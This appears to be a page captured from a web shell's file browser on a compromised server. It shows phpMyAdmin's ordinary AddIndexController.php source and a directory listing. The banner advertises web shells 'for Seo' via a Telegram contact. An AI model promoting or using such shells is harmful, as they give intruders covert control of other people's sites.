__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
declare(strict_types=1);
namespace PhpMyAdmin\Controllers\Table\Structure;
use PhpMyAdmin\Controllers\Table\AbstractController;
use PhpMyAdmin\Controllers\Table\StructureController;
use PhpMyAdmin\DatabaseInterface;
use PhpMyAdmin\Message;
use PhpMyAdmin\ResponseRenderer;
use PhpMyAdmin\Template;
use PhpMyAdmin\Util;
use function __;
use function count;
final class AddIndexController extends AbstractController
{
/** @var DatabaseInterface */
private $dbi;
/** @var StructureController */
private $structureController;
public function __construct(
ResponseRenderer $response,
Template $template,
string $db,
string $table,
DatabaseInterface $dbi,
StructureController $structureController
) {
parent::__construct($response, $template, $db, $table);
$this->dbi = $dbi;
$this->structureController = $structureController;
}
public function __invoke(): void
{
global $sql_query, $db, $table, $message;
$selected = $_POST['selected_fld'] ?? [];
if (empty($selected)) {
$this->response->setRequestStatus(false);
$this->response->addJSON('message', __('No column selected.'));
return;
}
$i = 1;
$selectedCount = count($selected);
$sql_query = 'ALTER TABLE ' . Util::backquote($table) . ' ADD INDEX(';
foreach ($selected as $field) {
$sql_query .= Util::backquote($field);
$sql_query .= $i++ === $selectedCount ? ');' : ', ';
}
$this->dbi->selectDb($db);
$result = $this->dbi->tryQuery($sql_query);
if (! $result) {
$message = Message::error($this->dbi->getError());
}
if (empty($message)) {
$message = Message::success();
}
($this->structureController)();
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| AddIndexController.php | File | 1.86 KB | 0644 |
|
| AddKeyController.php | File | 1.05 KB | 0644 |
|
| BrowseController.php | File | 2.32 KB | 0644 |
|
| CentralColumnsAddController.php | File | 1.55 KB | 0644 |
|
| CentralColumnsRemoveController.php | File | 1.57 KB | 0644 |
|
| ChangeController.php | File | 3.34 KB | 0644 |
|
| FulltextController.php | File | 1.86 KB | 0644 |
|
| MoveColumnsController.php | File | 6.37 KB | 0644 |
|
| PartitioningController.php | File | 10.38 KB | 0644 |
|
| PrimaryController.php | File | 3.65 KB | 0644 |
|
| ReservedWordCheckController.php | File | 1.47 KB | 0644 |
|
| SaveController.php | File | 14.42 KB | 0644 |
|
| SpatialController.php | File | 1.86 KB | 0644 |
|
| UniqueController.php | File | 1.86 KB | 0644 |
|